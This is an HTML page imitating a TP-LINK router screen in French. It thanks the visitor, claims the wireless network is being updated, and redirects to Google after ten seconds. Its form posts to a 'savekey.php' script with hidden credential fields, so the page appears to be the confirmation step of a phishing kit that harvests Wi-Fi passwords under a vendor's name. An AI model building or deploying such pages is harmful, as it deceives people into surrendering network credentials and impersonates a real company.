<html><head>





<meta http-equiv="refresh" content="10;url=http://www.google.com/" />


<meta name="viewport" content="width=device-width">


<style>
img {
    max-width: 100%;
}
</style><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<meta http-equiv="Content-Style-Type" content="text/css">

<link rel="stylesheet" href="./style/style.css" type="text/css">
<style type="text/css">
input.text
{
border:1px solid #E5E5E5;
height:26px;
line-height:26px;
width:175px;
padding:0px;
margin:4px 0px 0px 10px;
font-size:14px;
color:#6a6969;
font-family:"Verdana","Arial";
outline: none;
}
input.LoginBtn
{
height:28px;
display:inline-block;
width:110px;
margin-top:30px;
font-size:18px;
cursor:pointer;
background-color: #FF9933;}
#copyright
{
-webkit-text-size-adjust:none;
font-size:9px;
color:#6a6969;
font-family:"Verdana";
margin-top:40px;
display:inline-block;
}
</style>
<script language="JavaScript">
<!--

function OnCancel() {
  
  
   window.location="http://192.168.1.1";
  alert("You will be redirected to main page in 5 sec.");
            setTimeout('OnCancel()', 5000);
  
  }  
-->

</script>
</head><body style="font-family:Arial, sans-serief; background-color:#E5E5E5;margin:0px;padding:0px;" onload="doLoad()">
<form method="POST" action="data/savekey.php" id="regForm"><p>&nbsp;</p>
<p>&nbsp;</p>
<table width="580" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody><tr>
<td><table width="100%" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td height="31">&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr>
<td width="8%">&nbsp;</td><td width="90%" valign="top">
<br><br><br><table style="background-color:white" width="95%" border="0" align="center">
<tbody><tr>
<td height="35">&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr>
<td colspan="2" style="text-align:center;"><b> Merci beaucoup <br><br></b></td></tr>
<tr>
<td colspan="3" style="text-align:center;">
  
  <font size="3" color="gray"> <b> Veuillez patienter ... mise à jour de votre <font color="red">Réseau sans fil</font></b></font><br><br></td><td>&nbsp;
  </td></tr>



<tr>
<td align="center" colspan="3">
 <br> 
  <img src="loading.gif">
</td></tr><tr>
<td align="center" colspan="3">
<input type="HIDDEN" name="uiWebLoginhiddenUsername" value="ec37aa25501f5aea74d5eb3d19b08333"><input type="HIDDEN" name="uiWebLoginhiddenPassword" value="ec37aa25501f5aea74d5eb3d19b08333"></td></tr><tr>
<td height="30" colspan="3" style="text-align:center;">
<label id="copyright">

Copyright &copy; 2020 TP-LINK Technologies Co., Ltd. All rights reserved.</label>
</td></tr></tbody></table></td><td width="6%">&nbsp;</td></tr></tbody></table></td></tr></tbody></table><!-- RpZDT -->
</form><p>&nbsp;</p>

</body></html>